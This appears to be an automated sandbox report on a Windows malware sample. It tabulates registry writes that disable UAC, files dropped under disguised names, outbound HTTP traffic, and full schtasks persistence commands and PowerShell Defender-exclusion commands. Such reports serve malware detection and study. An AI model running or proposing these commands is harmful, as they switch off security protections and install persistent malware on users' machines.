| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\de-DE\9e8d7a4ca61bd9 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\RCX5940.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RCX5DC8.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\7a0fd90576e088 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\RCX5941.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RCX5E46.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe
"C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Documents\sysmon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default\Documents\sysmon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Documents\sysmon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\sysmon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe'
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b6ae157-8b64-43cb-ac10-a948f173177f.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\986d70b7-8c75-4058-9f1f-4cf43ce0a349.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eb7bcdea-7451-4191-97bb-7b63583916a8.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a76d9b01-68ad-4456-a1a4-00c1be7279e6.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\75d8afdd-eb20-4e77-b784-b85e7f9732e7.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11a04fb8-89e2-47d7-8e08-bbf933b6c666.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\adae97e0-5685-40c2-a067-5084cdafa210.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6791963a-f45c-4765-beb6-e7982de27768.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b0b4b5c5-dbff-4607-8e87-0383aaa9a4e4.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbbca99c-bd07-4012-ab91-e0547f958ba5.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6700d9fb-c70e-4df5-802b-0a60dde3a10d.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2010a383-8cfa-4199-ac9e-39e244c1c1de.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b2aa43f5-8e59-4c2f-a2c1-f6e1860f8773.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02ae8190-d26a-46e1-b614-1d5a1cceb15e.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58d4f751-9ef0-4884-911e-d5bcc125af2c.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30476efc-f3f6-4980-8ce8-6a01e7edc179.vbs"
C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe
"C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1789c539-d417-4967-a27b-2073ad42ae17.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\59b708f5-8b3b-4a9d-812e-f8fab493c2ab.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
| DE | 46.3.197.86:80 | | tcp |
